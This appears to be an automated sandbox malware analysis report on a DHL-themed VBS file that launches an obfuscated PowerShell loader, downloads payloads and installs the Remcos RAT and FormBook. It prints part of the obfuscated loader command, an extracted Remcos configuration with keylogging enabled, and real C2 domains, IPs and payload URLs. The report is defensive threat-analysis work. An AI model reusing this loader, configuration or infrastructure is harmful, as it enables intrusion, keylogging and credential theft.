            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", ProcessId: 1992, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBv

            Snort Signatures

            Timestamp:04/26/24-07:40:40.590604
            SID:2032777
            Source Port:3050
            Destination Port:49715
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-07:40:40.309700
            SID:2032776
            Source Port:49715
            Destination Port:3050
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: jgbours284hawara01.duckdns.orgAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 6%Perma Link
            Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 6%Perma Link
            Source: http://87.121.105.163Virustotal: Detection: 18%Perma Link
            Multi AV Scanner detection for submitted file
            Source: DHL_ES567436735845755676678877988975877.vbsReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
            Source: unknownHTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_222E10F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E6580 FindFirstFileExA,8_2_222E6580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49715 -> 45.88.90.110:3050
            Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.5:49715
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: jgbours284hawara01.duckdns.org
            Uses dynamic DNS services
            Source: unknownDNS query: name: jgbours284hawara01.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.5:49715 -> 45.88.90.110:3050
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: global trafficHTTP traffic detected: GET /Methink1.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: europrotectie.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Detentionen.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /PUzAKuQ35.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: europrotectie.ro
            Source: global trafficDNS traffic detected: DNS query: duelvalenza.it
            Source: global trafficDNS traffic detected: DNS query: www.duelvalenza.it
            Source: global trafficDNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
            Source: global trafficDNS traffic detected: DNS query: www.led-svitidla.eu
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:41:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl
            Source: powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl4
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.108
            Source: powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mM5
            Source: powershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microD
            Source: powershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
            Source: powershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://europrotectie.ro
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)B
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0B8
            Source: wab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
            Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
